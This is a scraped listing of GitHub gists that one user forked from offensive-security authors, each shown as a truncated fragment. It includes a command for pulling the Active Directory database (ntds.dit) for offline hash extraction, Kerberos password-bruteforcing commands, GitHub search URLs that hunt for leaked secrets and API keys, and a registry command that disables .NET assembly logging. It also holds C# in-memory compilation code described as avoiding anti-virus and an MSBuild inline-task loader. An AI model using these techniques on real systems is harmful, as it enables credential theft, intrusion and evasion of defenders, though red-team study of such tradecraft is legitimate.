sasqwatch

@sasqwatch
sasqwatch / dsdbutil.exe
Created Sep 16, 2019 — forked from bohops/dsdbutil.exe
yet another native AD database extraction utility
View dsdbutil.exe
DSDButil
========
- dsdbutil (dsdbutil.exe) is a utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)
- Example #1: Using Snapshot GUID obtained from cmd output
dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
@sasqwatch
sasqwatch / kerberos_attacks_cheatsheet.md
Created Sep 4, 2019 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform Kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@sasqwatch
sasqwatch / FindingComputersWithLocalAdmin.md
Created Aug 30, 2019 — forked from leechristensen/FindingComputersWithLocalAdmin.md
Useful Cypher queries to find computers that are local admin on other computers, or to find groups containing both users/computers.
View FindingComputersWithLocalAdmin.md

Computer accounts added to local admins on machines via a group in the local admins

MATCH p1 = (c1:Computer)-[r:MemberOf*1..]->(g1:Group)
WITH c1,g1
MATCH p2 = (g1:Group)-[r:AdminTo]->(c2:Computer)
RETURN c1.name As Principal,c2.name AS Target,g1.name AS ViaGroup

Computer accounts added to local admins on machines explicitly

@sasqwatch
sasqwatch / auto_git_query
Created Aug 28, 2019 — forked from nullenc0de/auto_git_query
Automated Github Queries (Can open 29 tabs at a time)
View auto_git_query
https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code
https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code
https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code
https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code
https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code
https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI
@sasqwatch
sasqwatch / UserWritableLocations.ps1
Created Aug 19, 2019 — forked from hinchley/UserWritableLocations.ps1
A PowerShell script for identifying user-writable folders. Usage is discussed in the following article: http://hinchley.net/2016/06/13/an-approach-for-managing-microsoft-applocker-policies/
View UserWritableLocations.ps1
# Paths that we've already excluded via AppLocker.
$exclusions = @()
# Paths to process.
$paths = @(
"C:\Windows"
)
# Setup log.
$log = "$PSScriptRoot\UserWritableLocations.log"
View Disable-Fusion-Log-.NET-Assembly-Binding-Logging.bat
reg add "HKLM\Software\Microsoft\Fusion" /v EnableLog /t REG_DWORD /d 0 /f
@sasqwatch
sasqwatch / CompileInMemory.cs
Created Aug 19, 2019 — forked from TheKevinWang/CompileInMemory.cs
Compile and run C# code in memory to avoid anti-virus. Taken from a C# ransomware sample: https://www.bleepingcomputer.com/news/security/new-c-ransomware-compiles-itself-at-runtime/. However, this will still execute csc.exe and drop a DLL to %temp%: https://twitter.com/Laughing_Mantis/status/991018563296157696
View CompileInMemory.cs
using System;
using System.Collections.Generic;
using System.Text;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.IO;
using System.Reflection;
namespace InMemoryCompiler
{
class Program
@sasqwatch
sasqwatch / JankyAF.csproj
Created Aug 19, 2019 — forked from bohops/JankyAF.csproj
Fun loader for Casey Smith's (@subTee) JanyAF.xsl
View JankyAF.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
@sasqwatch
sasqwatch / wifiscan.cmd
Created Aug 15, 2019 — forked from joswr1ght/wifiscan.cmd
Wi-Fi Scanning at the Windows Command Prompt, FOR loop style
View wifiscan.cmd
FOR /L %N IN () DO @netsh wlan show networks mode=bssid | findstr "^SSID Signal" && ping -n 16 127.0.0.1 >NUL && cls